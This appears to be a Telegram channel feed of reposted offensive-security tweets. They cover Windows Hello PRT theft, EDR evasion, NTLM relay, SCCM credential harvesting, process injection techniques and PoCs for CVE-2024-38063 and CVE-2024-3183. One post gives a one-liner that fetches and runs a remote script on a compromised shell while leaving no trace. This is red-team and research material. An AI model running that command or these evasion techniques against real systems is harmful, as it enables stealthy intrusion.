😈 [ Dirk-jan @_dirkjan ]
At Def Con I presented with @_EthicalChaos_ on new Windows Hello attacks. For ex: how to use the WinHello crypto keys from a low priv session to request a PRT on a different device, bypassing TPM protection of PRTs.
Slides:
🔗 https://dirkjanm.io/talks/
PoC:
🔗 https://github.com/dirkjanm/ROADtools/tree/master/winhello_assertion
🐥 [ tweet ]
At Def Con I presented with @_EthicalChaos_ on new Windows Hello attacks. For ex: how to use the WinHello crypto keys from a low priv session to request a PRT on a different device, bypassing TPM protection of PRTs.
Slides:
🔗 https://dirkjanm.io/talks/
PoC:
🔗 https://github.com/dirkjanm/ROADtools/tree/master/winhello_assertion
🐥 [ tweet ]
🔥3
😈 [ The Hacker's Choice (@thc@infosec.exchange) @hackerschoice ]
RELEASE:
This should be the 1st command you execute on a remote shell 🧨
Makes the BASH hack-ready. Lots of neat commands + apt-like static binary download ('bin nmap', ...).
LEAVES NO TRACE (memory only).
🔗 https://github.com/hackerschoice/hackshell
🐥 [ tweet ]
RELEASE:
This should be the 1st command you execute on a remote shell 🧨
source <(curl -SsfL https://thc.org/hs)
Makes the BASH hack-ready. Lots of neat commands + apt-like static binary download ('bin nmap', ...).
LEAVES NO TRACE (memory only).
🔗 https://github.com/hackerschoice/hackshell
🐥 [ tweet ]
👍15🔥4
Offensive Xwitter
😈 [ Daniel @0x64616e ] Lol, blocking the loading of EDR drivers with WDAC actually works. 🐥 [ tweet ][ quote ]
😈 [ Yarden Shafir @yarden_shafir ]
Another method that still works on most EDRs is HVCIDisallowedImages reg key that blocks drivers by filename.
Can take multiple filenames, but requires HVCI to be enabled + reboot.
🐥 [ tweet ][ quote ]
Another method that still works on most EDRs is HVCIDisallowedImages reg key that blocks drivers by filename.
Can take multiple filenames, but requires HVCI to be enabled + reboot.
🐥 [ tweet ][ quote ]
👍13
😈 [ Dazzy @dazzyddos ]
Wrote a blog post on abusing exclusions to evade AVs/EDR which is stealthy, effective and an often overlooked topic.
🔗 https://medium.com/seercurity-spotlight/abusing-av-edr-exclusions-to-evade-detections-21fe31d7ed49
🐥 [ tweet ]
Wrote a blog post on abusing exclusions to evade AVs/EDR which is stealthy, effective and an often overlooked topic.
🔗 https://medium.com/seercurity-spotlight/abusing-av-edr-exclusions-to-evade-detections-21fe31d7ed49
🐥 [ tweet ]
😢4🔥2
😈 [ Logan Goins @shellph1sh ]
Created another write-up, this time on NTLM relay attacks to LDAP(S), including details of WebClient coercion, NTLM transport vulnerabilities, and finally device takeover after achieving authentication. You can read about it on my blog :)
🔗 https://logan-goins.com/2024-07-23-ldap-relay/
🐥 [ tweet ]
Created another write-up, this time on NTLM relay attacks to LDAP(S), including details of WebClient coercion, NTLM transport vulnerabilities, and finally device takeover after achieving authentication. You can read about it on my blog :)
🔗 https://logan-goins.com/2024-07-23-ldap-relay/
🐥 [ tweet ]
🔥6🥱4👍1
😈 [ wei @XiaoWei___ ]
MSRC fixed a RCE bug in TCPIP module.
I found the bug several months ago.
Its score is 9.8 and exploitation is more likely. Please apply the patch immediately.
🐥 [ tweet ]
MSRC fixed a RCE bug in TCPIP module.
I found the bug several months ago.
Its score is 9.8 and exploitation is more likely. Please apply the patch immediately.
🐥 [ tweet ]
🤯12🔥3👍2
😈 [ Synacktiv @Synacktiv ]
In our latest blogpost, @croco_byte explores the inner workings of SCCM policies and introduces SCCMSecrets[.]py, a tool targeting secret policies in order to exploit misconfigurations, harvest credentials, and pivot across collections by impersonating legitimate clients.
🔗 https://www.synacktiv.com/publications/sccmsecretspy-exploiting-sccm-policies-distribution-for-credentials-harvesting-initial
🐥 [ tweet ]
In our latest blogpost, @croco_byte explores the inner workings of SCCM policies and introduces SCCMSecrets[.]py, a tool targeting secret policies in order to exploit misconfigurations, harvest credentials, and pivot across collections by impersonating legitimate clients.
🔗 https://www.synacktiv.com/publications/sccmsecretspy-exploiting-sccm-policies-distribution-for-credentials-harvesting-initial
🐥 [ tweet ]
🥱6👍4
😈 [ Tetsuo @7etsuo ]
Added templates for 24 process injection techniques to my Windows API Cheatsheet.
Code Injection Techniques
0. Process Enumeration Code
1. DLL Injection
2. PE Injection
3. Reflective Injection
4. APC Injection
5. Process Hollowing (Process Replacement)
6. AtomBombing
7. Process Doppelgänging
8. Process Herpaderping
9. Hooking Injection
10. Extra Windows Memory Injection
11. Propagate Injection
12. Heap Spray
13. Thread Execution Hijacking
14. Module Stomping
15. IAT Hooking
16. Inline Hooking
17. Debugger Injection
18. COM Hijacking
19. Phantom DLL Hollowing
20. PROPagate
21. Early Bird Injection
22. Shim-based Injection
23. Mapping Injection
24. KnownDlls Cache Poisoning
🔗 https://github.com/7etsuo/windows-api-function-cheatsheets
🐥 [ tweet ]
Added templates for 24 process injection techniques to my Windows API Cheatsheet.
Code Injection Techniques
0. Process Enumeration Code
1. DLL Injection
2. PE Injection
3. Reflective Injection
4. APC Injection
5. Process Hollowing (Process Replacement)
6. AtomBombing
7. Process Doppelgänging
8. Process Herpaderping
9. Hooking Injection
10. Extra Windows Memory Injection
11. Propagate Injection
12. Heap Spray
13. Thread Execution Hijacking
14. Module Stomping
15. IAT Hooking
16. Inline Hooking
17. Debugger Injection
18. COM Hijacking
19. Phantom DLL Hollowing
20. PROPagate
21. Early Bird Injection
22. Shim-based Injection
23. Mapping Injection
24. KnownDlls Cache Poisoning
🔗 https://github.com/7etsuo/windows-api-function-cheatsheets
🐥 [ tweet ]
👍10🔥4🥱3🍌2😢1
😈 [ Emeric Nasi @EmericNasi ]
Hi, I talked about advanced initial access in June at OffensiveX in Athens.
Slides are here:
🔗 https://github.com/sevagas/Advanced_Initial_access_in_2024_OffensiveX/blob/main/breach_the_gates_extended.pdf
For those who ask: I still don't know when the recorded talk will be published
🐥 [ tweet ]
Hi, I talked about advanced initial access in June at OffensiveX in Athens.
Slides are here:
🔗 https://github.com/sevagas/Advanced_Initial_access_in_2024_OffensiveX/blob/main/breach_the_gates_extended.pdf
For those who ask: I still don't know when the recorded talk will be published
🐥 [ tweet ]
👍9🥱2
😈 [ Will @BushidoToken ]
I am happy to share a new resource I recently created called The Ransomware Tool Matrix:
🔗 https://blog.bushidotoken.net/2024/08/the-ransomware-tool-matrix.html
🔗 https://github.com/BushidoUK/Ransomware-Tool-Matrix
🐥 [ tweet ]
I am happy to share a new resource I recently created called The Ransomware Tool Matrix:
🔗 https://blog.bushidotoken.net/2024/08/the-ransomware-tool-matrix.html
🔗 https://github.com/BushidoUK/Ransomware-Tool-Matrix
🐥 [ tweet ]
🔥11👍1
Offensive Xwitter
😈 [ wei @XiaoWei___ ] MSRC fixed a RCE bug in TCPIP module. I found the bug several months ago. Its score is 9.8 and exploitation is more likely. Please apply the patch immediately. 🐥 [ tweet ]
😈 [ Robel Campbell @RobelCampbell ]
Regarding CVE-2024-38063 IPV6 RCE in Windows...
After reading RFCs about optional headers in IPv6 packets, I managed to create POC to cause a crash. The bug check in this case isn't too detailed, but essentially the underflow creates a large value used in a loop which eventually write data out of bounds and causes a crash.
I imagine this can be weaponized using heap massaging techniques and corrupting adjacent objects in the heap.
As many have already stated before, this can easily be mitigated by applying the latest patches or disabling IPv6 (which is enabled by default).
🐥 [ tweet ]
Regarding CVE-2024-38063 IPV6 RCE in Windows...
After reading RFCs about optional headers in IPv6 packets, I managed to create POC to cause a crash. The bug check in this case isn't too detailed, but essentially the underflow creates a large value used in a loop which eventually write data out of bounds and causes a crash.
I imagine this can be weaponized using heap massaging techniques and corrupting adjacent objects in the heap.
As many have already stated before, this can easily be mitigated by applying the latest patches or disabling IPv6 (which is enabled by default).
🐥 [ tweet ]
👍9🍌1
Offensive Xwitter
😈 [ Robel Campbell @RobelCampbell ] Regarding CVE-2024-38063 IPV6 RCE in Windows... After reading RFCs about optional headers in IPv6 packets, I managed to create POC to cause a crash. The bug check in this case isn't too detailed, but essentially the underflow…
😈 [ farmpoet @f4rmpoet ]
It's time to take a closer look at CVE-2024-38063 (Windows TCPIP RCE).
I usually don't post partial analysis but since most available info is unreliable I'll do my best to try and shed some light.
This time I'll focus on my workflow and thought process as we go 🧵
🔗 https://threadreaderapp.com/thread/1825472703223992323.html
🐥 [ tweet ]
It's time to take a closer look at CVE-2024-38063 (Windows TCPIP RCE).
I usually don't post partial analysis but since most available info is unreliable I'll do my best to try and shed some light.
This time I'll focus on my workflow and thought process as we go 🧵
🔗 https://threadreaderapp.com/thread/1825472703223992323.html
🐥 [ tweet ]
Forwarded from nu11z
Всем привет, в связи с тем что последнее время приходится часто пентестить FreeIPA мы начали разрабатывать либу по типу impacket заточенную под особенности ипы. Пока начали реализовывать kerberos и написали пок для CVE-2024-3183. Если у кого-то будет желание как-то помочь в разработке - welcome.
https://github.com/c2micro/ipapocket
https://github.com/c2micro/ipapocket
🔥13😁1🍌1
😈 [ nc @thoughtfault ]
In a 2021 study, Jensen et al. observed a pronounced concentration of anime girl profile pictures among the most obscure accounts during a social network analysis of "infosec twitter" and associated subcommunities. As part of the study, a visualization was generated:
🐥 [ tweet ]
In a 2021 study, Jensen et al. observed a pronounced concentration of anime girl profile pictures among the most obscure accounts during a social network analysis of "infosec twitter" and associated subcommunities. As part of the study, a visualization was generated:
🐥 [ tweet ]
сойдет😁19👍1🤯1
Forwarded from APT
🔐 FreeIPA Rosting (CVE-2024-3183)
A vulnerability recently discovered by my friend @Im10n in FreeIPA involves a Kerberos TGS-REQ being encrypted using the client’s session key. If a principal’s key is compromised, an attacker could potentially perform offline brute-force attacks to decrypt tickets by exploiting the encrypted key and associated salts.
🔗Source:
https://github.com/Cyxow/CVE-2024-3183-POC
#freeipa #kerberos #hashcat #cve
———
Добавляем доклад Миши в вишлист на Offzone🚶♂️
A vulnerability recently discovered by my friend @Im10n in FreeIPA involves a Kerberos TGS-REQ being encrypted using the client’s session key. If a principal’s key is compromised, an attacker could potentially perform offline brute-force attacks to decrypt tickets by exploiting the encrypted key and associated salts.
🔗Source:
https://github.com/Cyxow/CVE-2024-3183-POC
#freeipa #kerberos #hashcat #cve
———
Добавляем доклад Миши в вишлист на Offzone
Please open Telegram to view this post
VIEW IN TELEGRAM
🔥17
😈 [ Kleiton Kurti @kleiton0x7e ]
A year ago I published a blog post on bypassing EDR using CS profiles. I’ve updated it to include an additional way of preventing msvcrt.dll from being flagged by Defender: by making the payload CRT library-independent.
🔗 https://kleiton0x00.github.io/posts/Harnessing-the-Power-of-Cobalt-Strike-Profiles-for-EDR-Evasion/
🐥 [ tweet ]
A year ago I published a blog post on bypassing EDR using CS profiles. I’ve updated it to include an additional way of preventing msvcrt.dll from being flagged by Defender: by making the payload CRT library-independent.
🔗 https://kleiton0x00.github.io/posts/Harnessing-the-Power-of-Cobalt-Strike-Profiles-for-EDR-Evasion/
🐥 [ tweet ]
👍12
#для_самых_маленьких
На собесах мне нравится задавать вопросы на понимание чужого кода, и одним из забавных примеров, где многие путаются при попытках быстро объяснить полученный диссонанс, мне видится распространенный из-за своей копипастности велосипед
На первый взгляд, в нем нет ничего необычного за исключением одного нюанса: реализация поиска имени модуля по двусвязному списку в этой функции будет работать только при нестандартном определении структуры
Если обратиться к документации, то первым полем структуры
Для того же, чтобы эта реализация
Почему так? 🤨
Кто хочет, может ответить на этот вопрос самостоятельно и переписать функцию
На собесах мне нравится задавать вопросы на понимание чужого кода, и одним из забавных примеров, где многие путаются при попытках быстро объяснить полученный диссонанс, мне видится распространенный из-за своей копипастности велосипед
kernel32!GetModuleHandle, взятый, например, отсюда.На первый взгляд, в нем нет ничего необычного за исключением одного нюанса: реализация поиска имени модуля по двусвязному списку в этой функции будет работать только при нестандартном определении структуры
LDR_DATA_TABLE_ENTRY.Если обратиться к документации, то первым полем структуры
LDR_DATA_TABLE_ENTRY будет значиться нечто PVOID Reserved1[2], что есть ни что иное, как двусвязный список LIST_ENTRY InLoadOrderLinks (изображение).Для того же, чтобы эта реализация
GetModuleHandle отработала, определение LDR_DATA_TABLE_ENTRY должно быть как здесь, а именно, начинаться со второго (из документации) поля LIST_ENTRY InMemoryOrderLinks.Почему так? 🤨
Кто хочет, может ответить на этот вопрос самостоятельно и переписать функцию
findNtDll, используя каноничное определение LDR_DATA_TABLE_ENTRY, или же открыть комментарии и ознакомиться с одним из возможных решений 👇🏻🤔6👍2🔥2
😈 [ Josh @passthehashbrwn ]
New blog from me on manually manipulating Vectored Exception Handlers to evade some EDRs and perform threadless process injection.
Blog:
🔗 https://securityintelligence.com/x-force/using-veh-for-defense-evasion-process-injection/
Accompanying code:
🔗 https://github.com/xforcered/VectoredExceptionHandling
🐥 [ tweet ]
New blog from me on manually manipulating Vectored Exception Handlers to evade some EDRs and perform threadless process injection.
Blog:
🔗 https://securityintelligence.com/x-force/using-veh-for-defense-evasion-process-injection/
Accompanying code:
🔗 https://github.com/xforcered/VectoredExceptionHandling
🐥 [ tweet ]
👍7🔥2